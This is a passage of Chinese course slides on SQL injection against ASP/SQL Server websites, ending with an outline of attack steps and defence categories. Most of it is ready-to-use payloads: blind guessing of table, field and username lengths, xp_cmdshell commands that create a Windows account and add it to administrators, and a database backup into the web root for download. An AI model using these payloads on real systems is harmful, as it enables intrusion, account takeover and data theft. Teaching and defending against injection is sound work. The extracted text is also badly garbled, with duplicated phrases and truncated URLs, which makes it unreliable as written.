43、轉(zhuǎn)成的值轉(zhuǎn)成int型，當然，轉(zhuǎn)的過程中肯定型，當然，轉(zhuǎn)的過程中肯定會出錯，如會出錯，如SQLServer的出錯提示是：的出錯提示是：將將nvarchar值值 ”abc” 轉(zhuǎn)換數(shù)據(jù)類型為轉(zhuǎn)換數(shù)據(jù)類型為 int 時發(fā)生語時發(fā)生語法錯誤法錯誤，則，則abc正是變量正是變量user的值，即數(shù)據(jù)庫的的值，即數(shù)據(jù)庫的用戶名。用戶名。 如果是如果是sa登錄，提示是將登錄，提示是將”dbo”轉(zhuǎn)換成轉(zhuǎn)換成int時時發(fā)生錯誤。發(fā)生錯誤。44 http:/ and (select count(*) from sysobjects)0 http:/ and (select count(*) from msysobje

44、cts)0如果數(shù)據(jù)庫是如果數(shù)據(jù)庫是SQLServer，那么第一個網(wǎng)址的頁面與原頁面，那么第一個網(wǎng)址的頁面與原頁面http:/ ID=49 And (Select Count(ID=49 And (Select Count(* *) from ) from AdminAdmin)=0)=0 如果頁面與原頁面相同，說明附加條件成立，即表如果頁面與原頁面相同，說明附加條件成立，即表AdminAdmin存在，存在，反之，即不存在。如此循環(huán)，直至猜到表名為止。反之，即不存在。如此循環(huán)，直至猜到表名為止。猜字段名：猜字段名： ID=49 And (Select Count(ID=49 And (Selec

45、t Count(字段名字段名) from Admin)=0) from Admin)=0猜用戶名長度：猜用戶名長度： ID=49ID=49 and (select top 1 and (select top 1 len(username)len(username) from Admin)0 from Admin)0 如果如果top 1top 1的的usernameusername長度大于長度大于0 0，則條件成立；接著就是，則條件成立；接著就是11、22、33這樣測試下去，一直到條件不成立為止，比如這樣測試下去，一直到條件不成立為止，比如77成立，成立，88不成不成立，就是立，就是len(us

46、ername)=8len(username)=8。46五、利用系統(tǒng)表注入五、利用系統(tǒng)表注入SQLServer數(shù)據(jù)庫數(shù)據(jù)庫 創(chuàng)建系統(tǒng)用戶：創(chuàng)建系統(tǒng)用戶： id=1;exec master.xp_cmdshell “net user name password /add” 存儲過程存儲過程xp_cmdshell用于調(diào)用系統(tǒng)命令，用用于調(diào)用系統(tǒng)命令，用net命命令新建了用戶名為令新建了用戶名為name、密碼為、密碼為password的的windows的帳號。該方法只適用于用的帳號。該方法只適用于用sa連接數(shù)據(jù)庫的情況，否連接數(shù)據(jù)庫的情況，否則，是沒有權(quán)限調(diào)用則，是沒有權(quán)限調(diào)用xp_cmdshell的

47、。的。 把該用戶加入把該用戶加入administrators組：組： Id=1;exec master.xp_cmdshell “net localgroup name administrators /add” 將新建的帳號將新建的帳號name加入管理員組。加入管理員組。 47獲取數(shù)據(jù)庫名獲取數(shù)據(jù)庫名 http:/Site/url.ASP?id=1 and db_name()0 db_name()是另一個系統(tǒng)變量，返回的是連接的數(shù)是另一個系統(tǒng)變量，返回的是連接的數(shù)據(jù)庫名。據(jù)庫名。備份數(shù)據(jù)庫備份數(shù)據(jù)庫 id=1;backup database 數(shù)據(jù)庫名數(shù)據(jù)庫名 to disk=c:inetpub

48、wwwroot1.db;- 根據(jù)獲得的數(shù)據(jù)庫名，加上某些根據(jù)獲得的數(shù)據(jù)庫名，加上某些IIS出錯暴露出的出錯暴露出的絕對路徑，將數(shù)據(jù)庫備份到絕對路徑，將數(shù)據(jù)庫備份到Web目錄下，再用目錄下，再用HTTP可可把整個數(shù)據(jù)庫完整的下載。把整個數(shù)據(jù)庫完整的下載。 4810.4.2 SQL10.4.2 SQL注入攻擊的實現(xiàn)過程注入攻擊的實現(xiàn)過程 1.1.尋找尋找SQLSQL注入點。注入點。 2. 2.獲取和驗證獲取和驗證SQLSQL注入點。注入點。 3. 3.獲取信息。獲取信息。 4. 4.實施直接控制。實施直接控制。4910.4.3 SOL10.4.3 SOL注入攻擊防范技術(shù)注入攻擊防范技術(shù)SQLSQL注入攻擊的常規(guī)防范技術(shù)可以分為四類注入攻擊的常規(guī)防范技術(shù)可以分為四類: :v修補應用程序漏洞。修補應用程序漏洞。vSQLSQL注入攻擊在線監(jiān)控。注入攻擊在線監(jiān)控。v發(fā)現(xiàn)并修補數(shù)據(jù)庫服務器發(fā)現(xiàn)并修補數(shù)據(jù)庫服務器SQLSQL注入漏洞。注入漏洞。v過濾過濾SQLSQL命令進行輸入驗證。命令進行輸入驗證。50 SQL SQL注入攻擊的常規(guī)防范具體措施注入攻擊的常規(guī)防范具體措施1、過